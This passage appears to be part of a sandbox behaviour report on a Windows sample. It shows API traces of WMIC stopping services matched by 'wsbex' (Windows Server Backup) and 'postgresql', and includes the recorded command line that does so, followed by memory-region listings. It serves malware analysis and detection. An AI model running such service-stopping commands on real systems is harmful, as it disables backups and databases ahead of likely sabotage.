dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0106.914] lstrlenW (lpString="/") returned 1 [0106.914] lstrlenW (lpString="STOPSERVICE") returned 11 [0106.914] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0106.914] lstrlenW (lpString="-") returned 1 [0106.914] lstrlenW (lpString="STOPSERVICE") returned 11 [0106.914] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0106.914] lstrlenW (lpString="STOPSERVICE") returned 11 [0106.914] lstrlenW (lpString="STOPSERVICE") returned 11 [0106.915] GetCurrentThreadId () returned 0xd38 [0106.915] ??0CHString@@QAE@XZ () returned 0x94f084 [0106.920] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0106.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0xb38a88, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0106.921] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0106.921] SysStringLen (param_1="SERVICE") returned 0x7 [0106.921] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0106.921] SysStringLen (param_1="'") returned 0x1 [0106.921] IWbemServices:GetObject (in: This=0xc20600, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x94f060*=0x0, ppCallResult=0x0 | out: ppObject=0x94f060*=0xc45300, ppCallResult=0x0) returned 0x0 [0106.926] lstrlenW (lpString="CALL") returned 4 [0106.926] lstrlenW (lpString="CALL") returned 4 [0106.926] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0106.926] IWbemClassObject:Get (in: This=0xc45300, wszName="Verbs", lFlags=0, pVal=0x94f018*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94f018*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc302d0*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xc30110, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.927] SafeArrayGetLBound (in: psa=0xc302d0, nDim=0x1, plLbound=0x94f028 | out: plLbound=0x94f028) returned 0x0 [0106.927] SafeArrayGetUBound (in: psa=0xc302d0, nDim=0x1, plUbound=0x94f030 | out: plUbound=0x94f030) returned 0x0 [0106.927] SafeArrayGetElement (in: psa=0xc302d0, rgIndices=0x94f038, pv=0x94f06c | out: pv=0x94f06c) returned 0x0 [0106.927] IWbemClassObject:Get (in: This=0xc46cc8, wszName="Name", lFlags=0, pVal=0x94f008*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94f008*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.927] lstrlenW (lpString="StartService") returned 12 [0106.927] lstrlenW (lpString="STOPSERVICE") returned 11 [0106.928] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0106.928] IUnknown:Release (This=0xc46cc8) returned 0x1 [0106.928] SafeArrayGetElement (in: psa=0xc302d0, rgIndices=0x94f038, pv=0x94f06c | out: pv=0x94f06c) returned 0x0 [0106.928] IWbemClassObject:Get (in: This=0xc471f8, wszName="Name", lFlags=0, pVal=0x94f008*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94f008*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.928] lstrlenW (lpString="StopService") returned 11 [0106.928] lstrlenW (lpString="STOPSERVICE") returned 11 [0106.928] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0106.928] GetCurrentThreadId () returned 0xd38 [0106.928] ??0CHString@@QAE@XZ () returned 0x94ee84 [0106.928] IWbemClassObject:Get (in: This=0xc471f8, wszName="Description", lFlags=0, pVal=0x94ee54*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94ee54*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.928] ??1CHString@@QAE@XZ () returned 0x74a66430 [0106.928] IWbemClassObject:Get (in: This=0xc471f8, wszName="Parameters", lFlags=0, pVal=0x94eff8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94eff8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.928] IWbemClassObject:Get (in: This=0xc471f8, wszName="VerbType", lFlags=0, pVal=0x94ef90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94ef90*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.928] IWbemClassObject:Get (in: This=0xc471f8, wszName="Derivation", lFlags=0, pVal=0x94ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.928] lstrlenW (lpString="StopService") returned 11 [0106.928] lstrlenW (lpString="StopService") returned 11 [0106.929] IUnknown:Release (This=0xc471f8) returned 0x1 [0106.929] IUnknown:Release (This=0xc45300) returned 0x0 [0106.929] ??1CHString@@QAE@XZ () returned 0x74a66430 [0106.929] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0106.929] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0106.929] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x89509db | out: _String="Select", _Context=0x89509db) returned="Select" [0106.930] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x89509db | out: _String=0x0, _Context=0x89509db) returned="*" [0106.930] lstrlenW (lpString="FROM") returned 4 [0106.930] lstrlenW (lpString="*") returned 1 [0106.930] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0106.930] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x89509db | out: _String=0x0, _Context=0x89509db) returned="from" [0106.930] lstrlenW (lpString="FROM") returned 4 [0106.930] lstrlenW (lpString="from") returned 4 [0106.930] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0106.930] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x89509db | out: _String=0x0, _Context=0x89509db) returned="Win32_Service" [0106.930] lstrlenW (lpString="SET") returned 3 [0106.930] lstrlenW (lpString="CALL") returned 4 [0106.930] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0106.930] lstrlenW (lpString="CREATE") returned 6 [0106.930] lstrlenW (lpString="CALL") returned 4 [0106.930] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0106.930] lstrlenW (lpString="GET") returned 3 [0106.930] lstrlenW (lpString="CALL") returned 4 [0106.930] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0106.930] lstrlenW (lpString="LIST") returned 4 [0106.930] lstrlenW (lpString="CALL") returned 4 [0106.930] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0106.930] lstrlenW (lpString="ASSOC") returned 5 [0106.930] lstrlenW (lpString="CALL") returned 4 [0106.930] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0106.930] WbemLocator:IUnknown:AddRef (This=0xbf8050) returned 0x3 [0106.930] lstrlenW (lpString="") returned 0 [0106.930] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.930] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0106.930] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.930] lstrlenW (lpString="LHNIWSJ") returned 7 [0106.930] GetCurrentThreadId () returned 0xd38 [0106.930] GetCurrentProcess () returned 0xffffffff [0106.930] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x94f988 | out: TokenHandle=0x94f988*=0x270) returned 1 [0106.930] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x94f984 | out: TokenInformation=0x0, ReturnLength=0x94f984) returned 0 [0106.930] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0xb38bb8, TokenInformationLength=0x118, ReturnLength=0x94f984 | out: TokenInformation=0xb38bb8, ReturnLength=0x94f984) returned 1 [0106.931] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0xb38bb8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0106.931] CloseHandle (hObject=0x270) returned 1 [0106.931] lstrlenW (lpString="GET") returned 3 [0106.931] lstrlenW (lpString="CALL") returned 4 [0106.931] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0106.931] lstrlenW (lpString="LIST") returned 4 [0106.931] lstrlenW (lpString="CALL") returned 4 [0106.931] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0106.931] lstrlenW (lpString="SET") returned 3 [0106.931] lstrlenW (lpString="CALL") returned 4 [0106.931] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0106.931] lstrlenW (lpString="CALL") returned 4 [0106.931] lstrlenW (lpString="CALL") returned 4 [0106.931] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0106.931] ??0CHString@@QAE@XZ () returned 0x94f948 [0106.931] GetCurrentThreadId () returned 0xd38 [0106.931] SysStringLen (param_1="\\\\") returned 0x2 [0106.931] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0106.931] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0106.931] SysStringLen (param_1="\\") returned 0x1 [0106.931] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0106.931] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0106.932] WbemLocator:IWbemLocator:ConnectServer (in: This=0xbf8050, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0xc206f0) returned 0x0 [0106.937] CoSetProxyBlanket (pProxy=0xc206f0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0106.937] ??1CHString@@QAE@XZ () returned 0x74a66430 [0106.938] ??0CHString@@QAE@XZ () returned 0x94f944 [0106.938] GetCurrentThreadId () returned 0xd38 [0106.938] lstrlenA (lpString="") returned 0 [0106.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xb38b38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0106.938] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0106.938] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0106.938] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x895087f | out: _String="Select", _Context=0x895087f) returned="Select" [0106.938] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x895087f | out: _String=0x0, _Context=0x895087f) returned="*" [0106.938] lstrlenW (lpString="FROM") returned 4 [0106.938] lstrlenW (lpString="*") returned 1 [0106.938] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0106.938] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x895087f | out: _String=0x0, _Context=0x895087f) returned="from" [0106.938] lstrlenW (lpString="FROM") returned 4 [0106.938] lstrlenW (lpString="from") returned 4 [0106.938] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0106.938] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x895087f | out: _String=0x0, _Context=0x895087f) returned="Win32_Service" [0106.938] IWbemServices:GetObject (in: This=0xc206f0, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x94f91c*=0x0, ppCallResult=0x0 | out: ppObject=0x94f91c*=0xc45cc0, ppCallResult=0x0) returned 0x0 [0106.997] IWbemClassObject:GetMethod (in: This=0xc45cc0, wszName="STOPSERVICE", lFlags=0, ppInSignature=0x94f928, ppOutSignature=0x94f914 | out: ppInSignature=0x94f928*=0x0, ppOutSignature=0x94f914*=0xc46040) returned 0x0 [0106.997] IUnknown:Release (This=0xc46040) returned 0x0 [0106.997] IUnknown:Release (This=0xc45cc0) returned 0x0 [0106.997] ??0CHString@@QAE@XZ () returned 0x94f7f4 [0106.997] GetCurrentThreadId () returned 0xd38 [0106.997] lstrlenA (lpString="") returned 0 [0106.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xb38b38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0106.998] lstrlenA (lpString="") returned 0 [0106.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xb38b38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0106.998] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0106.998] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0106.998] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x89507f7 | out: _String="Select", _Context=0x89507f7) returned="Select" [0106.998] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x89507f7 | out: _String=0x0, _Context=0x89507f7) returned="*" [0106.998] lstrlenW (lpString="FROM") returned 4 [0106.998] lstrlenW (lpString="*") returned 1 [0106.998] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0106.998] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x89507f7 | out: _String=0x0, _Context=0x89507f7) returned="from" [0106.998] lstrlenW (lpString="FROM") returned 4 [0106.998] lstrlenW (lpString="from") returned 4 [0106.998] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0106.998] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x89507f7 | out: _String=0x0, _Context=0x89507f7) returned="Win32_Service" [0106.998] lstrlenA (lpString="SELECT * FROM ") returned 14 [0106.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0xb39000, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0106.998] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0106.998] SysStringLen (param_1="Win32_Service") returned 0xd [0106.998] lstrlenA (lpString=" WHERE ") returned 7 [0106.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0xb38e40, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0106.998] SysStringLen (param_1=" WHERE ") returned 0x7 [0106.998] SysStringLen (param_1="caption LIKE '%wsbex%'") returned 0x16 [0106.998] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0106.998] SysStringLen (param_1=" WHERE caption LIKE '%wsbex%'") returned 0x1d [0106.999] IWbemServices:ExecQuery (in: This=0xc206f0, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%wsbex%'", lFlags=48, pCtx=0x0, ppEnum=0x94f7fc | out: ppEnum=0x94f7fc*=0xc46068) returned 0x0 [0107.087] CoSetProxyBlanket (pProxy=0xc46068, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0107.089] IEnumWbemClassObject:Next (in: This=0xc46068, lTimeout=-1, uCount=0x1, apObjects=0x94f800, puReturned=0x94f7ec | out: apObjects=0x94f800*=0x0, puReturned=0x94f7ec*=0x0) returned 0x1 [0107.622] IUnknown:Release (This=0xc46068) returned 0x0 [0107.624] ??1CHString@@QAE@XZ () returned 0x74a66430 [0107.624] ??1CHString@@QAE@XZ () returned 0x74a66430 [0107.624] GetCurrentThreadId () returned 0xd38 [0107.624] ??0CHString@@QAE@PBG@Z () returned 0x94f9b8 [0107.624] ??YCHString@@QAEABV0@PBG@Z () returned 0x94f9b8 [0107.624] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0xb39060, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0107.625] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0107.625] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0xb38a98, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0107.625] __iob_func () returned 0x77ac1208 [0107.625] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 27 [0107.626] __iob_func () returned 0x77ac1208 [0107.627] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0107.627] ??1CHString@@QAE@XZ () returned 0x1 [0107.627] IUnknown:Release (This=0xc206f0) returned 0x0 [0107.629] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0107.629] _kbhit () returned 0x0 [0107.630] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0107.631] WbemLocator:IUnknown:Release (This=0xbf8050) returned 0x2 [0107.631] IUnknown:Release (This=0xc20740) returned 0x0 [0107.632] IUnknown:Release (This=0xc20600) returned 0x0 [0107.633] WbemLocator:IUnknown:Release (This=0xbf8050) returned 0x1 [0107.633] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0107.633] WbemLocator:IUnknown:Release (This=0xbf8050) returned 0x0 [0107.634] CoUninitialize () [0107.654] exit (_Code=0) [0107.655] ??1CHString@@QAE@XZ () returned 0x74a66430 [0107.655] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 177 os_tid = 0xd3c Thread: id = 178 os_tid = 0xd40 Thread: id = 179 os_tid = 0xd44 Thread: id = 180 os_tid = 0xd48 Process: id = "34" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x446f1000" os_pid = "0xd50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2274 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2275 start_va = 0xf60000 end_va = 0x4f5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f60000" filename = "" Region: id = 2276 start_va = 0x4f60000 end_va = 0x4f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f60000" filename = "" Region: id = 2277 start_va = 0x4f80000 end_va = 0x4f81fff entry_point = 0x0 region_type = private name = "private_0x0000000004f80000" filename = "" Region: id = 2278 start_va = 0x4f90000 end_va = 0x4fa3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f90000" filename = "" Region: id = 2279 start_va = 0x4fb0000 end_va = 0x4feffff entry_point = 0x0 region_type = private name = "private_0x0000000004fb0000" filename = "" Region: id = 2280 start_va = 0x4ff0000 end_va = 0x50effff entry_point = 0x0 region_type = private name = "private_0x0000000004ff0000" filename = "" Region: id = 2281 start_va = 0x50f0000 end_va = 0x50f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050f0000" filename = "" Region: id = 2282 start_va = 0x5100000 end_va = 0x5100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005100000" filename = "" Region: id = 2283 start_va = 0x5110000 end_va = 0x5111fff entry_point = 0x0 region_type = private name = "private_0x0000000005110000" filename = "" Region: id = 2284 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2285 start_va = 0x7f1d0000 end_va = 0x7f1f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f1d0000" filename = "" Region: id = 2286 start_va = 0x7f1f7000 end_va = 0x7f1f7fff entry_point = 0x0 region_type = private name = "private_0x000000007f1f7000" filename = "" Region: id = 2287 start_va = 0x7f1fc000 end_va = 0x7f1fcfff entry_point = 0x0 region_type = private name = "private_0x000000007f1fc000" filename = "" Region: id = 2288 start_va = 0x7f1fd000 end_va = 0x7f1fffff entry_point = 0x0 region_type = private name = "private_0x000000007f1fd000" filename = "" Region: id = 2289 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2290 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2291 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 2292 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2293 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 2294 start_va = 0x5210000 end_va = 0x521ffff entry_point = 0x0 region_type = private name = "private_0x0000000005210000" filename = "" Region: id = 2295 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2296 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2297 start_va = 0x52e0000 end_va = 0x53dffff entry_point = 0x0 region_type = private name = "private_0x00000000052e0000" filename = "" Region: id = 2298 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2339 start_va = 0x4f60000 end_va = 0x4f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f60000" filename = "" Region: id = 2340 start_va = 0x5120000 end_va = 0x51ddfff entry_point = 0x5120000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2341 start_va = 0x5220000 end_va = 0x525ffff entry_point = 0x0 region_type = private name = "private_0x0000000005220000" filename = "" Region: id = 2342 start_va = 0x53e0000 end_va = 0x54dffff entry_point = 0x0 region_type = private name = "private_0x00000000053e0000" filename = "" Region: id = 2343 start_va = 0x5610000 end_va = 0x561ffff entry_point = 0x0 region_type = private name = "private_0x0000000005610000" filename = "" Region: id = 2344 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2345 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2346 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2347 start_va = 0x7f0d0000 end_va = 0x7f1cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0d0000" filename = "" Region: id = 